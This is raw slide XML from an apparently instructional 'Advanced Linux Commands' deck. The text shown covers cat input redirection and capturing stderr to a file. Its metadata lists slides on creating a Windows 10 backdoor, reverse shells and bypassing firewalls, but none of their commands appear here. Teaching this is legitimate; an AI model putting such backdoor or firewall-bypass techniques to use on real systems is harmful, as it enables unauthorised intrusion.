          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Display the content of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tell cat to take input from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myfile.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send the myflle.txt content to input device,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cat to take input from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the device, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same as 2 (0 is a default input device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4536549" y="4364019"/>
            <a:ext cx="2438400" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301519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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>error: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stderr</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5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717047" y="1973525"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230083" y="2257748"/>
            <a:ext cx="2098516" cy="18885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23196" y="1631320"/>
            <a:ext cx="805029" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>err</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3178588" y="3451091"/>
            <a:ext cx="5197257" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Save error message to a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as system can’t find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4328599" y="1661836"/>
            <a:ext cx="4410691" cy="1209844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5315361" y="2190613"/>
            <a:ext cx="526274" cy="12604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7425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Networking</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51842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Chatting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="845568" y="1082425"/>
            <a:ext cx="6596413" cy="3815661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2416641626"/>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2120</TotalTime>
  <Words>654</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>123</Paragraphs>
  <Slides>28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Adobe Devanagari</vt:lpstr>
      <vt:lpstr>Monaco</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Sniglet</vt:lpstr>
      <vt:lpstr>Dosis</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Friar template</vt:lpstr>
      <vt:lpstr>Advanced Linux Commands</vt:lpstr>
      <vt:lpstr>Standard input/output/error</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Standard output: stdout</vt:lpstr>
      <vt:lpstr>Another example</vt:lpstr>
      <vt:lpstr>Standard input: stdin</vt:lpstr>
      <vt:lpstr>Standard error: stderr</vt:lpstr>
      <vt:lpstr>Networking</vt:lpstr>
      <vt:lpstr>Chatting</vt:lpstr>
      <vt:lpstr>Data Transfer</vt:lpstr>
      <vt:lpstr>Your work</vt:lpstr>
      <vt:lpstr>Goal</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Create a backdoor at Window 10</vt:lpstr>
      <vt:lpstr>Backdoor background</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>How to bypass firewall?</vt:lpstr>
      <vt:lpstr>Reverse shell definition</vt:lpstr>
      <vt:lpstr>Reverse shell demo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Extra credits: Another approach for reverse shell</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</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Frank Xu</cp:lastModifiedBy>
  <cp:revision>261</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-30T03:32:47Z</dcterms:modified>
</cp:coreProperties>
</file>